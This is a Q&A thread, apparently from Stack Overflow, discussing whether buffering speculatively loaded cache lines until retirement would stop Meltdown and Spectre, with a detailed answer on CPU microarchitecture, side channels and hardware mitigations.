4

If new CPUs had a cache buffer which was only committed to the actual CPU cache if the instructions are ever committed would attacks similar to Meltdown still be possible?

The proposal is to make speculative execution be able to load from memory, but not write to the CPU caches until they are actually committed.

Peter Cordes
  • 328,167
  • 45
  • 605
  • 847
Bernardo Sulzbach
  • 1,293
  • 10
  • 26

2 Answers2

9

TL:DR: yes I think it would solve Spectre (and Meltdown) in their current form (using a flush+read cache-timing side channel to copy the secret data from a physical register), but probably be too expensive (in power cost, and maybe also performance) to be a likely implementation.

But with hyperthreading (or more generally any SMT), there's also an ALU / port-pressure side-channel if you can get mis-speculation to run data-dependent ALU instructions with the secret data, instead of using it as an array index. The Meltdown paper discusses this possibility before focusing on the flush+reload cache-timing side-channel. (It's more viable for Meltdown than Spectre, because you have much better control of the timing of when the the secret data is used).

So modifying cache behaviour doesn't block the attacks. It would take away the reliable side-channel for getting the secret data into the attacking process, though. (i.e. ALU timing has higher noise and thus lower bandwidth to get the same reliability; Shannon's noisy channel theorem), and you have to make sure your code runs on the same physical core as the code under attack.

On CPUs without SMT (e.g. Intel's desktop i5 chips), the ALU timing side-channel is very hard to use with Spectre, because you can't directly use perf counters on code you don't have privilege for. (But Meltdown could still be exploited by timing your own ALU instructions with Linux perf, for example).


Meltdown specifically is much easier to defend against, microarchitecturally, with simpler and cheaper changes to the hard-wired parts of the CPU that microcode updates can't rewire.

You don't need to block speculative loads from affecting cache; the change could be as simple as letting speculative execution continue after a TLB-hit load that will fault if it reaches retirement, but with the value used by speculative execution of later instructions forced to 0 because of the failed permission check against the TLB entry.

So the mis-speculated (after the faulting load of secret) touch array[secret*4096] load would always make the same cache line hot, with no secret-data-dependent behaviour. The secret data itself would enter cache, but not a physical register. (And this stops ALU / port-pressure side-channels, too.)

Stopping the faulting load from even bringing the "secret" line into cache in the first place could make it harder to tell the difference between a kernel mapping and an unmapped page, which could possibly help protect against user-space trying to defeat KASLR by finding which virtual addresses the kernel has mapped. But that's not Meltdown.


Spectre

Spectre is the hard one because the mis-speculated instructions that make data-dependent modifications to microarchitectural state do have permission to read the secret data. Yes, a "load queue" that works similarly to the store queue could do the trick, but implementing it efficiently could be expensive. (Especially given the cache coherency problem that I didn't think of when I wrote this first section.)

(There are other ways of implementing the your basic idea; maybe there's even a way that's viable. But extra bits on L1D lines to track their status has downsides and isn't obviously easier.)

The store queue tracks stores from execution until they commit to L1D cache. (Stores can't commit to L1D until after they retire, because that's the point at which they're known to be non-speculative, and thus can be made globally visible to other cores).

A load queue would have to store whole incoming cache lines, not just the bytes that were loaded. (But note that Skylake-X can do 64-byte ZMM stores, so its store-buffer entries do have to be the size of a cache line. But if they can borrow space from each other or something, then there might not be 64 * entries bytes of storage available, i.e. maybe only the full number of entries is usable with scalar or narrow-vector stores. I've never read anything about a limitation like this, so I don't think there is one, but it's plausible)

A more serious problem is that Intel's current L1D design has 2 read ports + 1 write port. (And maybe another port for writing lines that arrive from L2 in parallel with committing a store? There was some discussion about that on Unexpectedly poor and weirdly bimodal performance for store loop on Intel Skylake.)

If your loaded data can't enter L1D until after the loads retire, then they're probably going to be competing for the same write port that stores use.

Loads that hit in L1D can still come directly from L1D, though, and loads that hit in the memory-order-buffer could still be executed at 2 per clock. (The MOB would now include this new load queue as well as the usual store queue + markers for loads to maintain x86 memory ordering semantics). You still need both L1D read ports to maintain performance for code that doesn't touch a lot of new memory, and mostly is reloading stuff that's been hot in L1D for a while.

This would make the MOB about twice as large (in terms of data storage), although it doesn't need any more entries. As I understand it, the MOB in current Intel CPUs is composed of the individual load-buffer and store-buffer entries. (Haswell has 72 and 42 respectively).


Hmm, a further complication is that the load data in the MOB has to maintain cache coherency with other cores. This is very different from store data, which is private and hasn't become globally visible / isn't part of the global memory order and cache coherency until it commits to L1D.

So this proposed "load queue" implementation mechanism for your idea is probably not feasible without tweaks: it would have to be checked by invalidation-requests from other cores, so that's another read-port needed in the MOB.

Any possible implementation would have the problem of needing to later commit to L1D like a store. I think it would be a significant burden not to be able to evict + allocate a new line when it arrived from off-core.

(Even allowing speculative eviction but not speculative replacement from conflicts leaves open a possible cache-timing attack. You'd prime all the lines and then do a load that would evict one from one set of lines or another, and find which line was evicted instead of which one was fetched using a similar cache-timing side channel. So using extra bits in L1D to find / evict lines loaded during recovery from mis-speculation wouldn't eliminate this side-channel.)


Footnote: all instructions are speculative. This question is worded well, but I think many people reading about OoO exec and thinking about Meltdown / Spectre fall into this trap of confusing speculative execution with mis-speculation.

Remember that all instructions are speculative when they're executed. It's not known to be correct speculation until retirement. Meltdown / Spectre depend on accessing secret data and using it during mis-speculation. But the basis of current OoO CPU designs is that you don't know whether you've speculated correctly or not; everything is speculative until retirement.

Any load or store could potentially fault, and so can some ALU instructions (e.g. floating point if exceptions are unmasked), so any performance cost that applies "only when executing speculatively" actually applies all the time. This is why stores can't commit from the store queue into L1D until after the store uops have retired from the out-of-order CPU core (with the store data in the store queue).

However, I think conditional and indirect branches are treated specially, because they're expected to mis-speculate some of the time, and optimizing recovery for them is important. Modern CPUs do better with branches than just rolling back to the current retirement state when a mispredict is detected, I think using a checkpoint buffer of some sort. So out-of-order execution for instructions before the branch can continue during recovery.

But loop and other branches are very common, so most code executes "speculatively" in this sense, too, with at least one branch-rollback checkpoint not yet verified as correct speculation. Most of the time it's correct speculation, so no rollback happens.

Recovery for mis-speculation of memory ordering or faulting loads is a full pipeline-nuke, rolling back to the retirement architectural state. So I think only branches consume the branch checkpoint microarchitectural resources.

Anyway, all of this is what makes Spectre so insidious: the CPU can't tell the difference between mis-speculation and correct speculation until after the fact. If it knew it was mis-speculating, it would initiate rollback instead of executing useless instructions / uops. Indirect branches are not rare, either (in user-space); every DLL or shared library function call uses one in normal executables on Windows and Linux.

Peter Cordes
  • 328,167
  • 45
  • 605
  • 847
  • I'm not actually a HW designer, I just know a bit about electronics and have read stuff :P So this is pretty hand-wavey, but hopefully my mental model of what you can build in silicon is close enough for it to be useful hand-waving. – Peter Cordes Jan 11 '18 at 06:36
  • Would adding a Speculative attribute bit P in the cache lines work? The normal code would treat speculative lines as invalid (perform the read from memory anyway then toggle P) and the speculative code would access normal lines for reading but block for writing (or: use LFB if any available to temporarily hold the line before merging it at retirement). Speculative lines would have to be invisible to CC snoops and alter the S state so that no RFOs are made (and fall back to the write-to-normal-lines case above). Not sure it will work though, just my 2 cents off the top of my head :) – Margaret Bloom Jan 11 '18 at 11:21
  • 2
    @MargaretBloom: Note that most instructions are executed speculatively. It's not known until all previous instructions retire whether it was correct speculation. Most loads don't fault, FP exceptions are almost never unmasked, so normally the only mis-speculation is branch prediction and the occasional memory-ordering. But all instructions have to be treated as speculative until they retire. I should probably put this into an answer somewhere, because you're probably not the only person to be thinking things like "the normal code", but load uops are never non-speculative when executing. – Peter Cordes Jan 11 '18 at 18:01
  • @MargaretBloom: Using bits in cache might work, but I think only if you're willing to have speculative loads evict other lines. This stops a flush+read cache-timing attack, but slower side-channels might still be viable, as I mentioned in my answer. – Peter Cordes Jan 11 '18 at 18:05
  • Right, what a silly reasoning. Code *is* speculative until it is retired. But why the emphasis on the loads? "*but load uops are never non-speculative when executing*". Isn't this true for every instruction? Thanks for your time. – Margaret Bloom Jan 11 '18 at 20:37
  • 1
    @MargaretBloom: Yes, it's true for every instruction. I singled them out because speculative loads are the problem here, and speculative stores only go into the store queue. (Although note that the Meltdown paper points out that speculative execution of ALU instructions can tie up different execution units in a data-dependent way, so there's a timing side-channel with hyperthreading if you can get the secret data into a physical register for use by further instructions at all.) Hmm, I forgot about that; that means this might not even mitigate Meltdown. – Peter Cordes Jan 11 '18 at 20:42
  • Thank you Peter, I believe a general side-channel attack falls under the realm of Spectre, Meltdown is specific to the speculative load which must then use a cache covert channel (sorry I'm being talkative today :) ) – Margaret Bloom Jan 11 '18 at 20:53
  • 1
    @MargaretBloom: Thanks for your comments, they made me think of more interesting stuff to write (see updated answer). The key to Meltdown is that an under-privileged load gets kernel data into a register. Using it as a load index is just one side channel. (The Meltdown paper doesn't explain this well, but see https://security.stackexchange.com/questions/177100/why-are-amd-processors-not-less-vulnerable-to-meltdown-and-spectre/177101#177101). Either attack can use any side-channel. (Spectre with an ALU-timing side-channel is only barely plausible, but Meltdown can pin both threads). – Peter Cordes Jan 11 '18 at 21:46
  • Theoretically, Spectre could also be used against syscalls, so this should allow some window for ALU-timing attack? Anyway, my point was more on the line that Spectre demonstrates the general concept of extracting information through speculative execution and side-channel, while Meltdown applies this to a specific flaw that doesn't require a victim code to execute. – Margaret Bloom Jan 12 '18 at 09:06
  • 1
    @MargaretBloom: Oh yes, Spectre against the kernel directly is a thing, good point. Attacking the syscall dispatch branch would make the timing from `syscall` to execution of the target branch fairly predictable. Still, with all the overhead of training the branch predictor, and executing `syscall`, you can only keep the CPU core running the "gadget" sequence for a *much* smaller fraction of the total time than with Meltdown. (With Meltdown you could plausibly measure ALU port pressure averaged over multiple aborted TSX transactions). And it will detect the mispredict faster than with Melt – Peter Cordes Jan 12 '18 at 09:25
0

I suspect the overhead from buffering and committing the buffer would render the specEx/caching useless?

This is purely speculative (no pun intended) - I would love to see someone with a lower level background weigh in this!

Reece Como
  • 75
  • 9
  • I think it's plausible that you could design a load-buffer that works like the store-buffer, but the overhead would probably still be quite high (see my answer). If there are any other micro-architectural defenses, this idea is probably near the bottom of the list. – Peter Cordes Jan 11 '18 at 06:34
  • You provide a great overview of the factors involved, great answer! – Reece Como Jan 11 '18 at 08:39